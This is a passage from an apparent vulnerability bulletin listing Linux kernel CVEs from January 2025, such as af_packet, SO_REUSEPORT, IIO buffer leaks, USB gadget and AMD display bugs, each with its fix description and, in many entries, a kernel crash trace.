In the Linux kernel, the following vulnerability has been resolved: af_packet: fix vlan_get_tci() vs MSG_PEEK Blamed commit forgot MSG_PEEK case, allowing a crash [1] as found by syzbot. Rework vlan_get_tci() to not touch skb at all, so that it can be used from many cpus on the same skb. Add a const qualifier to skb argument. [1] skbuff: skb_under_panic: text:ffffffff8a8da482 len:32 put:14 head:ffff88807a1d5800 data:ffff88807a1d5810 tail:0x14 end:0x140 dev:<NULL> ------------[ cut here ]------------ kernel BUG at net/core/skbuff.c:206 ! Oops: invalid opcode: 0000 [#1] PREEMPT SMP KASAN PTI CPU: 0 UID: 0 PID: 5880 Comm: syz-executor172 Not tainted 6.13.0-rc3-syzkaller-00762-g9268abe611b0 #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 RIP: 0010:skb_panic net/core/skbuff.c:206 [inline] RIP: 0010:skb_under_panic+0x14b/0x150 net/core/skbuff.c:216 Code: 0b 8d 48 c7 c6 9e 6c 26 8e 48 8b 54 24 08 8b 0c 24 44 8b 44 24 04 4d 89 e9 50 41 54 41 57 41 56 e8 3a 5a 79 f7 48 83 c4 20 90 <0f> 0b 0f 1f 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 f3 RSP: 0018:ffffc90003baf5b8 EFLAGS: 00010286 RAX: 0000000000000087 RBX: dffffc0000000000 RCX: 8565c1eec37aa000 RDX: 0000000000000000 RSI: 0000000080000000 RDI: 0000000000000000 RBP: ffff88802616fb50 R08: ffffffff817f0a4c R09: 1ffff92000775e50 R10: dffffc0000000000 R11: fffff52000775e51 R12: 0000000000000140 R13: ffff88807a1d5800 R14: ffff88807a1d5810 R15: 0000000000000014 FS: 00007fa03261f6c0(0000) GS:ffff8880b8600000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007ffd65753000 CR3: 0000000031720000 CR4: 00000000003526f0 DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000 DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400 Call Trace: <TASK> skb_push+0xe5/0x100 net/core/skbuff.c:2636 vlan_get_tci+0x272/0x550 net/packet/af_packet.c:565 packet_recvmsg+0x13c9/0x1ef0 net/packet/af_packet.c:3616 sock_recvmsg_nosec net/socket.c:1044 [inline] sock_recvmsg+0x22f/0x280 net/socket.c:1066 ____sys_recvmsg+0x1c6/0x480 net/socket.c:2814 ___sys_recvmsg net/socket.c:2856 [inline] do_recvmmsg+0x426/0xab0 net/socket.c:2951 __sys_recvmmsg net/socket.c:3025 [inline] __do_sys_recvmmsg net/socket.c:3048 [inline] __se_sys_recvmmsg net/socket.c:3041 [inline] __x64_sys_recvmmsg+0x199/0x250 net/socket.c:3041 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0xf3/0x230 arch/x86/entry/common.c:83 | 2025-01-15 | not yet calculated | CVE-2024-57902 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: net: restrict SO_REUSEPORT to inet sockets After blamed commit, crypto sockets could accidentally be destroyed from RCU call back, as spotted by zyzbot [1]. Trying to acquire a mutex in RCU callback is not allowed. Restrict SO_REUSEPORT socket option to inet sockets. v1 of this patch supported TCP, UDP and SCTP sockets, but fcnal-test.sh test needed RAW and ICMP support. [1] BUG: sleeping function called from invalid context at kernel/locking/mutex.c:562 in_atomic(): 1, irqs_disabled(): 0, non_block: 0, pid: 24, name: ksoftirqd/1 preempt_count: 100, expected: 0 RCU nest depth: 0, expected: 0 1 lock held by ksoftirqd/1/24: #0: ffffffff8e937ba0 (rcu_callback){....}-{0:0}, at: rcu_lock_acquire include/linux/rcupdate.h:337 [inline] #0: ffffffff8e937ba0 (rcu_callback){....}-{0:0}, at: rcu_do_batch kernel/rcu/tree.c:2561 [inline] #0: ffffffff8e937ba0 (rcu_callback){....}-{0:0}, at: rcu_core+0xa37/0x17a0 kernel/rcu/tree.c:2823 Preemption disabled at: [<ffffffff8161c8c8>] softirq_handle_begin kernel/softirq.c:402 [inline] [<ffffffff8161c8c8>] handle_softirqs+0x128/0x9b0 kernel/softirq.c:537 CPU: 1 UID: 0 PID: 24 Comm: ksoftirqd/1 Not tainted 6.13.0-rc3-syzkaller-00174-ga024e377efed #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 09/13/2024 Call Trace: <TASK> __dump_stack lib/dump_stack.c:94 [inline] dump_stack_lvl+0x241/0x360 lib/dump_stack.c:120 __might_resched+0x5d4/0x780 kernel/sched/core.c:8758 __mutex_lock_common kernel/locking/mutex.c:562 [inline] __mutex_lock+0x131/0xee0 kernel/locking/mutex.c:735 crypto_put_default_null_skcipher+0x18/0x70 crypto/crypto_null.c:179 aead_release+0x3d/0x50 crypto/algif_aead.c:489 alg_do_release crypto/af_alg.c:118 [inline] alg_sock_destruct+0x86/0xc0 crypto/af_alg.c:502 __sk_destruct+0x58/0x5f0 net/core/sock.c:2260 rcu_do_batch kernel/rcu/tree.c:2567 [inline] rcu_core+0xaaa/0x17a0 kernel/rcu/tree.c:2823 handle_softirqs+0x2d4/0x9b0 kernel/softirq.c:561 run_ksoftirqd+0xca/0x130 kernel/softirq.c:950 smpboot_thread_fn+0x544/0xa30 kernel/smpboot.c:164 kthread+0x2f0/0x390 kernel/kthread.c:389 ret_from_fork+0x4b/0x80 arch/x86/kernel/process.c:147 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:244 </TASK> | 2025-01-15 | not yet calculated | CVE-2024-57903 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: adc: at91: call input_free_device() on allocated iio_dev Current implementation of at91_ts_register() calls input_free_deivce() on st->ts_input, however, the err label can be reached before the allocated iio_dev is stored to st->ts_input. Thus call input_free_device() on input instead of st->ts_input. | 2025-01-19 | not yet calculated | CVE-2024-57904 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: adc: ti-ads1119: fix information leak in triggered buffer The 'scan' local struct is used to push data to user space from a triggered buffer, but it has a hole between the sample (unsigned int) and the timestamp. This hole is never initialized. Initialize the struct to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57905 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: adc: ti-ads8688: fix information leak in triggered buffer The 'buffer' local array is used to push data to user space from a triggered buffer, but it does not set values for inactive channels, as it only uses iio_for_each_active_channel() to assign new values. Initialize the array to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57906 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: adc: rockchip_saradc: fix information leak in triggered buffer The 'data' local struct is used to push data to user space from a triggered buffer, but it does not set values for inactive channels, as it only uses iio_for_each_active_channel() to assign new values. Initialize the struct to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57907 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: imu: kmx61: fix information leak in triggered buffer The 'buffer' local array is used to push data to user space from a triggered buffer, but it does not set values for inactive channels, as it only uses iio_for_each_active_channel() to assign new values. Initialize the array to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57908 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: light: bh1745: fix information leak in triggered buffer The 'scan' local struct is used to push data to user space from a triggered buffer, but it does not set values for inactive channels, as it only uses iio_for_each_active_channel() to assign new values. Initialize the struct to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57909 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: light: vcnl4035: fix information leak in triggered buffer The 'buffer' local array is used to push data to userspace from a triggered buffer, but it does not set an initial value for the single data element, which is an u16 aligned to 8 bytes. That leaves at least 4 bytes uninitialized even after writing an integer value with regmap_read(). Initialize the array to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57910 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: dummy: iio_simply_dummy_buffer: fix information leak in triggered buffer The 'data' array is allocated via kmalloc() and it is used to push data to user space from a triggered buffer, but it does not set values for inactive channels, as it only uses iio_for_each_active_channel() to assign new values. Use kzalloc for the memory allocation to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57911 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: iio: pressure: zpa2326: fix information leak in triggered buffer The 'sample' local struct is used to push data to user space from a triggered buffer, but it has a hole between the temperature and the timestamp (u32 pressure, u16 temperature, GAP, u64 timestamp). This hole is never initialized. Initialize the struct to zero before using it to avoid pushing uninitialized information to userspace. | 2025-01-19 | not yet calculated | CVE-2024-57912 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_fs: Remove WARN_ON in functionfs_bind This commit addresses an issue related to below kernel panic where panic_on_warn is enabled. It is caused by the unnecessary use of WARN_ON in functionsfs_bind, which easily leads to the following scenarios. 1.adb_write in adbd 2. UDC write via configfs ================= ===================== ->usb_ffs_open_thread() ->UDC write ->open_functionfs() ->configfs_write_iter() ->adb_open() ->gadget_dev_desc_UDC_store() ->adb_write() ->usb_gadget_register_driver_owner ->driver_register() ->StartMonitor() ->bus_add_driver() ->adb_read() ->gadget_bind_driver() <times-out without BIND event> ->configfs_composite_bind() ->usb_add_function() ->open_functionfs() ->ffs_func_bind() ->adb_open() ->functionfs_bind() <ffs->state !=FFS_ACTIVE> The adb_open, adb_read, and adb_write operations are invoked from the daemon, but trying to bind the function is a process that is invoked by UDC write through configfs, which opens up the possibility of a race condition between the two paths. In this race scenario, the kernel panic occurs due to the WARN_ON from functionfs_bind when panic_on_warn is enabled. This commit fixes the kernel panic by removing the unnecessary WARN_ON. Kernel panic - not syncing: kernel: panic_on_warn set ... [ 14.542395] Call trace: [ 14.542464] ffs_func_bind+0x1c8/0x14a8 [ 14.542468] usb_add_function+0xcc/0x1f0 [ 14.542473] configfs_composite_bind+0x468/0x588 [ 14.542478] gadget_bind_driver+0x108/0x27c [ 14.542483] really_probe+0x190/0x374 [ 14.542488] __driver_probe_device+0xa0/0x12c [ 14.542492] driver_probe_device+0x3c/0x220 [ 14.542498] __driver_attach+0x11c/0x1fc [ 14.542502] bus_for_each_dev+0x104/0x160 [ 14.542506] driver_attach+0x24/0x34 [ 14.542510] bus_add_driver+0x154/0x270 [ 14.542514] driver_register+0x68/0x104 [ 14.542518] usb_gadget_register_driver_owner+0x48/0xf4 [ 14.542523] gadget_dev_desc_UDC_store+0xf8/0x144 [ 14.542526] configfs_write_iter+0xf0/0x138 | 2025-01-19 | not yet calculated | CVE-2024-57913 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: usb: typec: tcpci: fix NULL pointer issue on shared irq case The tcpci_irq() may meet below NULL pointer dereference issue: [ 2.641851] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010 [ 2.641951] status 0x1, 0x37f [ 2.650659] Mem abort info: [ 2.656490] ESR = 0x0000000096000004 [ 2.660230] EC = 0x25: DABT (current EL), IL = 32 bits [ 2.665532] SET = 0, FnV = 0 [ 2.668579] EA = 0, S1PTW = 0 [ 2.671715] FSC = 0x04: level 0 translation fault [ 2.676584] Data abort info: [ 2.679459] ISV = 0, ISS = 0x00000004, ISS2 = 0x00000000 [ 2.684936] CM = 0, WnR = 0, TnD = 0, TagAccess = 0 [ 2.689980] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0 [ 2.695284] [0000000000000010] user address but active_mm is swapper [ 2.701632] Internal error: Oops: 0000000096000004 [#1] PREEMPT SMP [ 2.707883] Modules linked in: [ 2.710936] CPU: 1 UID: 0 PID: 87 Comm: irq/111-2-0051 Not tainted 6.12.0-rc6-06316-g7f63786ad3d1-dirty #4 [ 2.720570] Hardware name: NXP i.MX93 11X11 EVK board (DT) [ 2.726040] pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 2.732989] pc : tcpci_irq+0x38/0x318 [ 2.736647] lr : _tcpci_irq+0x14/0x20 [ 2.740295] sp : ffff80008324bd30 [ 2.743597] x29: ffff80008324bd70 x28: ffff800080107894 x27: ffff800082198f70 [ 2.750721] x26: ffff0000050e6680 x25: ffff000004d172ac x24: ffff0000050f0000 [ 2.757845] x23: ffff000004d17200 x22: 0000000000000001 x21: ffff0000050f0000 [ 2.764969] x20: ffff000004d17200 x19: 0000000000000000 x18: 0000000000000001 [ 2.772093] x17: 0000000000000000 x16: ffff80008183d8a0 x15: ffff00007fbab040 [ 2.779217] x14: ffff00007fb918c0 x13: 0000000000000000 x12: 000000000000017a [ 2.786341] x11: 0000000000000001 x10: 0000000000000a90 x9 : ffff80008324bd00 [ 2.793465] x8 : ffff0000050f0af0 x7 : ffff00007fbaa840 x6 : 0000000000000031 [ 2.800589] x5 : 000000000000017a x4 : 0000000000000002 x3 : 0000000000000002 [ 2.807713] x2 : ffff80008324bd3a x1 : 0000000000000010 x0 : 0000000000000000 [ 2.814838] Call trace: [ 2.817273] tcpci_irq+0x38/0x318 [ 2.820583] _tcpci_irq+0x14/0x20 [ 2.823885] irq_thread_fn+0x2c/0xa8 [ 2.827456] irq_thread+0x16c/0x2f4 [ 2.830940] kthread+0x110/0x114 [ 2.834164] ret_from_fork+0x10/0x20 [ 2.837738] Code: f9426420 f9001fe0 d2800000 52800201 (f9400a60) This may happen on shared irq case. Such as two Type-C ports share one irq. After the first port finished tcpci_register_port(), it may trigger interrupt. However, if the interrupt comes by chance the 2nd port finishes devm_request_threaded_irq(), the 2nd port interrupt handler will run at first. Then the above issue happens due to tcpci is still a NULL pointer in tcpci_irq() when dereference to regmap. devm_request_threaded_irq() <-- port1 irq comes disable_irq(client->irq); tcpci_register_port() This will restore the logic to the state before commit (77e85107a771 "usb: typec: tcpci: support edge irq"). However, moving tcpci_register_port() earlier creates a problem when use edge irq because tcpci_init() will be called before devm_request_threaded_irq(). The tcpci_init() writes the ALERT_MASK to the hardware to tell it to start generating interrupts but we're not ready to deal with them yet, then the ALERT events may be missed and ALERT line will not recover to high level forever. To avoid the issue, this will also set ALERT_MASK register after devm_request_threaded_irq() return. | 2025-01-19 | not yet calculated | CVE-2024-57914 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: usb: gadget: u_serial: Disable ep before setting port to null to fix the crash caused by port being null Considering that in some extreme cases, when performing the unbinding operation, gserial_disconnect has cleared gser->ioport, which triggers gadget reconfiguration, and then calls gs_read_complete, resulting in access to a null pointer. Therefore, ep is disabled before gserial_disconnect sets port to null to prevent this from happening. Call trace: gs_read_complete+0x58/0x240 usb_gadget_giveback_request+0x40/0x160 dwc3_remove_requests+0x170/0x484 dwc3_ep0_out_start+0xb0/0x1d4 __dwc3_gadget_start+0x25c/0x720 kretprobe_trampoline.cfi_jt+0x0/0x8 kretprobe_trampoline.cfi_jt+0x0/0x8 udc_bind_to_driver+0x1d8/0x300 usb_gadget_probe_driver+0xa8/0x1dc gadget_dev_desc_UDC_store+0x13c/0x188 configfs_write_iter+0x160/0x1f4 vfs_write+0x2d0/0x40c ksys_write+0x7c/0xf0 __arm64_sys_write+0x20/0x30 invoke_syscall+0x60/0x150 el0_svc_common+0x8c/0xf8 do_el0_svc+0x28/0xa0 el0_svc+0x24/0x84 | 2025-01-19 | not yet calculated | CVE-2024-57915 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: misc: microchip: pci1xxxx: Resolve kernel panic during GPIO IRQ handling Resolve kernel panic caused by improper handling of IRQs while accessing GPIO values. This is done by replacing generic_handle_irq with handle_nested_irq. | 2025-01-19 | not yet calculated | CVE-2024-57916 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: topology: Keep the cpumask unchanged when printing cpumap During fuzz testing, the following warning was discovered: different return values (15 and 11) from vsnprintf("%*pbl ", ...) test:keyward is WARNING in kvasprintf WARNING: CPU: 55 PID: 1168477 at lib/kasprintf.c:30 kvasprintf+0x121/0x130 Call Trace: kvasprintf+0x121/0x130 kasprintf+0xa6/0xe0 bitmap_print_to_buf+0x89/0x100 core_siblings_list_read+0x7e/0xb0 kernfs_file_read_iter+0x15b/0x270 new_sync_read+0x153/0x260 vfs_read+0x215/0x290 ksys_read+0xb9/0x160 do_syscall_64+0x56/0x100 entry_SYSCALL_64_after_hwframe+0x78/0xe2 The call trace shows that kvasprintf() reported this warning during the printing of core_siblings_list. kvasprintf() has several steps: (1) First, calculate the length of the resulting formatted string. (2) Allocate a buffer based on the returned length. (3) Then, perform the actual string formatting. (4) Check whether the lengths of the formatted strings returned in steps (1) and (2) are consistent. If the core_cpumask is modified between steps (1) and (3), the lengths obtained in these two steps may not match. Indeed our test includes cpu hotplugging, which should modify core_cpumask while printing. To fix this issue, cache the cpumask into a temporary variable before calling cpumap_print_{list, cpumask}_to_buf(), to keep it unchanged during the printing process. | 2025-01-19 | not yet calculated | CVE-2024-57917 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix page fault due to max surface definition mismatch DC driver is using two different values to define the maximum number of surfaces: MAX_SURFACES and MAX_SURFACE_NUM. Consolidate MAX_SURFACES as the unique definition for surface updates across DC. It fixes page fault faced by Cosmic users on AMD display versions that support two overlay planes, since the introduction of cursor overlay mode. [Nov26 21:33] BUG: unable to handle page fault for address: 0000000051d0f08b [ +0.000015] #PF: supervisor read access in kernel mode [ +0.000006] #PF: error_code(0x0000) - not-present page [ +0.000005] PGD 0 P4D 0 [ +0.000007] Oops: Oops: 0000 [#1] PREEMPT SMP NOPTI [ +0.000006] CPU: 4 PID: 71 Comm: kworker/u32:6 Not tainted 6.10.0+ #300 [ +0.000006] Hardware name: Valve Jupiter/Jupiter, BIOS F7A0131 01/30/2024 [ +0.000007] Workqueue: events_unbound commit_work [drm_kms_helper] [ +0.000040] RIP: 0010:copy_stream_update_to_stream.isra.0+0x30d/0x750 [amdgpu] [ +0.000847] Code: 8b 10 49 89 94 24 f8 00 00 00 48 8b 50 08 49 89 94 24 00 01 00 00 8b 40 10 41 89 84 24 08 01 00 00 49 8b 45 78 48 85 c0 74 0b <0f> b6 00 41 88 84 24 90 64 00 00 49 8b 45 60 48 85 c0 74 3b 48 8b [ +0.000010] RSP: 0018:ffffc203802f79a0 EFLAGS: 00010206 [ +0.000009] RAX: 0000000051d0f08b RBX: 0000000000000004 RCX: ffff9f964f0a8070 [ +0.000004] RDX: ffff9f9710f90e40 RSI: ffff9f96600c8000 RDI: ffff9f964f000000 [ +0.000004] RBP: ffffc203802f79f8 R08: 0000000000000000 R09: 0000000000000000 [ +0.000005] R10: 0000000000000000 R11: 0000000000000000 R12: ffff9f96600c8000 [ +0.000004] R13: ffff9f9710f90e40 R14: ffff9f964f000000 R15: ffff9f96600c8000 [ +0.000004] FS: 0000000000000000(0000) GS:ffff9f9970000000(0000) knlGS:0000000000000000 [ +0.000005] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ +0.000005] CR2: 0000000051d0f08b CR3: 00000002e6a20000 CR4: 0000000000350ef0 [ +0.000005] Call Trace: [ +0.000011] <TASK> [ +0.000010] ? __die_body.cold+0x19/0x27 [ +0.000012] ? page_fault_oops+0x15a/0x2d0 [ +0.000014] ? exc_page_fault+0x7e/0x180 [ +0.000009] ? asm_exc_page_fault+0x26/0x30 [ +0.000013] ? copy_stream_update_to_stream.isra.0+0x30d/0x750 [amdgpu] [ +0.000739] ? dc_commit_state_no_check+0xd6c/0xe70 [amdgpu] [ +0.000470] update_planes_and_stream_state+0x49b/0x4f0 [amdgpu] [ +0.000450] ? srso_return_thunk+0x5/0x5f [ +0.000009] ? commit_minimal_transition_state+0x239/0x3d0 [amdgpu] [ +0.000446] update_planes_and_stream_v2+0x24a/0x590 [amdgpu] [ +0.000464] ? srso_return_thunk+0x5/0x5f [ +0.000009] ? sort+0x31/0x50 [ +0.000007] ? amdgpu_dm_atomic_commit_tail+0x159f/0x3a30 [amdgpu] [ +0.000508] ? srso_return_thunk+0x5/0x5f [ +0.000009] ? amdgpu_crtc_get_scanout_position+0x28/0x40 [amdgpu] [ +0.000377] ? srso_return_thunk+0x5/0x5f [ +0.000009] ? drm_crtc_vblank_helper_get_vblank_timestamp_internal+0x160/0x390 [drm] [ +0.000058] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? dma_fence_default_wait+0x8c/0x260 [ +0.000010] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? wait_for_completion_timeout+0x13b/0x170 [ +0.000006] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? dma_fence_wait_timeout+0x108/0x140 [ +0.000010] ? commit_tail+0x94/0x130 [drm_kms_helper] [ +0.000024] ? process_one_work+0x177/0x330 [ +0.000008] ? worker_thread+0x266/0x3a0 [ +0.000006] ? __pfx_worker_thread+0x10/0x10 [ +0.000004] ? kthread+0xd2/0x100 [ +0.000006] ? __pfx_kthread+0x10/0x10 [ +0.000006] ? ret_from_fork+0x34/0x50 [ +0.000004] ? __pfx_kthread+0x10/0x10 [ +0.000005] ? ret_from_fork_asm+0x1a/0x30 [ +0.000011] </TASK> (cherry picked from commit 1c86c81a86c60f9b15d3e3f43af0363cf56063e7) | 2025-01-19 | not yet calculated | CVE-2024-57918 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amd/display: fix divide error in DM plane scale calcs dm_get_plane_scale doesn't take into account plane scaled size equal to zero, leading to a kernel oops due to division by zero. Fix by setting out-scale size as zero when the dst size is zero, similar to what is done by drm_calc_scale(). This issue started with the introduction of cursor ovelay mode that uses this function to assess cursor mode changes via dm_crtc_get_cursor_mode() before checking plane state. [Dec17 17:14] Oops: divide error: 0000 [#1] PREEMPT SMP NOPTI [ +0.000018] CPU: 5 PID: 1660 Comm: surface-DP-1 Not tainted 6.10.0+ #231 [ +0.000007] Hardware name: Valve Jupiter/Jupiter, BIOS F7A0131 01/30/2024 [ +0.000004] RIP: 0010:dm_get_plane_scale+0x3f/0x60 [amdgpu] [ +0.000553] Code: 44 0f b7 41 3a 44 0f b7 49 3e 83 e0 0f 48 0f a3 c2 73 21 69 41 28 e8 03 00 00 31 d2 41 f7 f1 31 d2 89 06 69 41 2c e8 03 00 00 <41> f7 f0 89 07 e9 d7 d8 7e e9 44 89 c8 45 89 c1 41 89 c0 eb d4 66 [ +0.000005] RSP: 0018:ffffa8df0de6b8a0 EFLAGS: 00010246 [ +0.000006] RAX: 00000000000003e8 RBX: ffff9ac65c1f6e00 RCX: ffff9ac65d055500 [ +0.000003] RDX: 0000000000000000 RSI: ffffa8df0de6b8b0 RDI: ffffa8df0de6b8b4 [ +0.000004] RBP: ffff9ac64e7a5800 R08: 0000000000000000 R09: 0000000000000a00 [ +0.000003] R10: 00000000000000ff R11: 0000000000000054 R12: ffff9ac6d0700010 [ +0.000003] R13: ffff9ac65d054f00 R14: ffff9ac65d055500 R15: ffff9ac64e7a60a0 [ +0.000004] FS: 00007f869ea00640(0000) GS:ffff9ac970080000(0000) knlGS:0000000000000000 [ +0.000004] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ +0.000003] CR2: 000055ca701becd0 CR3: 000000010e7f2000 CR4: 0000000000350ef0 [ +0.000004] Call Trace: [ +0.000007] <TASK> [ +0.000006] ? __die_body.cold+0x19/0x27 [ +0.000009] ? die+0x2e/0x50 [ +0.000007] ? do_trap+0xca/0x110 [ +0.000007] ? do_error_trap+0x6a/0x90 [ +0.000006] ? dm_get_plane_scale+0x3f/0x60 [amdgpu] [ +0.000504] ? exc_divide_error+0x38/0x50 [ +0.000005] ? dm_get_plane_scale+0x3f/0x60 [amdgpu] [ +0.000488] ? asm_exc_divide_error+0x1a/0x20 [ +0.000011] ? dm_get_plane_scale+0x3f/0x60 [amdgpu] [ +0.000593] dm_crtc_get_cursor_mode+0x33f/0x430 [amdgpu] [ +0.000562] amdgpu_dm_atomic_check+0x2ef/0x1770 [amdgpu] [ +0.000501] drm_atomic_check_only+0x5e1/0xa30 [drm] [ +0.000047] drm_mode_atomic_ioctl+0x832/0xcb0 [drm] [ +0.000050] ? __pfx_drm_mode_atomic_ioctl+0x10/0x10 [drm] [ +0.000047] drm_ioctl_kernel+0xb3/0x100 [drm] [ +0.000062] drm_ioctl+0x27a/0x4f0 [drm] [ +0.000049] ? __pfx_drm_mode_atomic_ioctl+0x10/0x10 [drm] [ +0.000055] amdgpu_drm_ioctl+0x4e/0x90 [amdgpu] [ +0.000360] __x64_sys_ioctl+0x97/0xd0 [ +0.000010] do_syscall_64+0x82/0x190 [ +0.000008] ? __pfx_drm_mode_createblob_ioctl+0x10/0x10 [drm] [ +0.000044] ? srso_return_thunk+0x5/0x5f [ +0.000006] ? drm_ioctl_kernel+0xb3/0x100 [drm] [ +0.000040] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? __check_object_size+0x50/0x220 [ +0.000007] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? drm_ioctl+0x2a4/0x4f0 [drm] [ +0.000039] ? __pfx_drm_mode_createblob_ioctl+0x10/0x10 [drm] [ +0.000043] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? __pm_runtime_suspend+0x69/0xc0 [ +0.000006] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? amdgpu_drm_ioctl+0x71/0x90 [amdgpu] [ +0.000366] ? srso_return_thunk+0x5/0x5f [ +0.000006] ? syscall_exit_to_user_mode+0x77/0x210 [ +0.000007] ? srso_return_thunk+0x5/0x5f [ +0.000005] ? do_syscall_64+0x8e/0x190 [ +0.000006] ? srso_return_thunk+0x5/0x5f [ +0.000006] ? do_syscall_64+0x8e/0x190 [ +0.000006] ? srso_return_thunk+0x5/0x5f [ +0.000007] entry_SYSCALL_64_after_hwframe+0x76/0x7e [ +0.000008] RIP: 0033:0x55bb7cd962bc [ +0.000007] Code: 4c 89 6c 24 18 4c 89 64 24 20 4c 89 74 24 28 0f 57 c0 0f 11 44 24 30 89 c7 48 8d 54 24 08 b8 10 00 00 00 be bc 64 ---truncated--- | 2025-01-19 | not yet calculated | CVE-2024-57919 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amdkfd: wq_release signals dma_fence only when available kfd_process_wq_release() signals eviction fence by dma_fence_signal() which wanrs if dma_fence is NULL. kfd_process->ef is initialized by kfd_process_device_init_vm() through ioctl. That means the fence is NULL for a new created kfd_process, and close a kfd_process right after open it will trigger the warning. This commit conditionally signals the eviction fence in kfd_process_wq_release() only when it is available. [ 503.660882] WARNING: CPU: 0 PID: 9 at drivers/dma-buf/dma-fence.c:467 dma_fence_signal+0x74/0xa0 [ 503.782940] Workqueue: kfd_process_wq kfd_process_wq_release [amdgpu] [ 503.789640] RIP: 0010:dma_fence_signal+0x74/0xa0 [ 503.877620] Call Trace: [ 503.880066] <TASK> [ 503.882168] ? __warn+0xcd/0x260 [ 503.885407] ? dma_fence_signal+0x74/0xa0 [ 503.889416] ? report_bug+0x288/0x2d0 [ 503.893089] ? handle_bug+0x53/0xa0 [ 503.896587] ? exc_invalid_op+0x14/0x50 [ 503.900424] ? asm_exc_invalid_op+0x16/0x20 [ 503.904616] ? dma_fence_signal+0x74/0xa0 [ 503.908626] kfd_process_wq_release+0x6b/0x370 [amdgpu] [ 503.914081] process_one_work+0x654/0x10a0 [ 503.918186] worker_thread+0x6c3/0xe70 [ 503.921943] ? srso_alias_return_thunk+0x5/0xfbef5 [ 503.926735] ? srso_alias_return_thunk+0x5/0xfbef5 [ 503.931527] ? __kthread_parkme+0x82/0x140 [ 503.935631] ? __pfx_worker_thread+0x10/0x10 [ 503.939904] kthread+0x2a8/0x380 [ 503.943132] ? __pfx_kthread+0x10/0x10 [ 503.946882] ret_from_fork+0x2d/0x70 [ 503.950458] ? __pfx_kthread+0x10/0x10 [ 503.954210] ret_from_fork_asm+0x1a/0x30 [ 503.958142] </TASK> [ 503.960328] ---[ end trace 0000000000000000 ]--- (cherry picked from commit 2774ef7625adb5fb9e9265c26a59dca7b8fd171e) | 2025-01-19 | not yet calculated | CVE-2024-57920 |
| Linux--Linux |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: Add a lock when accessing the buddy trim function When running YouTube videos and Steam games simultaneously, the tester found a system hang / race condition issue with the multi-display configuration setting. Adding a lock to the buddy allocator's trim function would be the solution. <log snip> [ 7197.250436] general protection fault, probably for non-canonical address 0xdead000000000108 [ 7197.250447] RIP: 0010:__alloc_range+0x8b/0x340 [amddrm_buddy] [ 7197.250470] Call Trace: [ 7197.250472] <TASK> [ 7197.250475] ? show_regs+0x6d/0x80 [ 7197.250481] ? die_addr+0x37/0xa0 [ 7197.250483] ? exc_general_protection+0x1db/0x480 [ 7197.250488] ? drm_suballoc_new+0x13c/0x93d [drm_suballoc_helper] [ 7197.250493] ? asm_exc_general_protection+0x27/0x30 [ 7197.250498] ? __alloc_range+0x8b/0x340 [amddrm_buddy] [ 7197.250501] ? __alloc_range+0x109/0x340 [amddrm_buddy] [ 7197.250506] amddrm_buddy_block_trim+0x1b5/0x260 [amddrm_buddy] [ 7197.250511] amdgpu_vram_mgr_new+0x4f5/0x590 [amdgpu] [ 7197.250682] amdttm_resource_alloc+0x46/0xb0 [amdttm] [ 7197.250689] ttm_bo_alloc_resource+0xe4/0x370 [amdttm] [ 7197.250696] amdttm_bo_validate+0x9d/0x180 [amdttm] [ 7197.250701] amdgpu_bo_pin+0x15a/0x2f0 [amdgpu] [ 7197.250831] amdgpu_dm_plane_helper_prepare_fb+0xb2/0x360 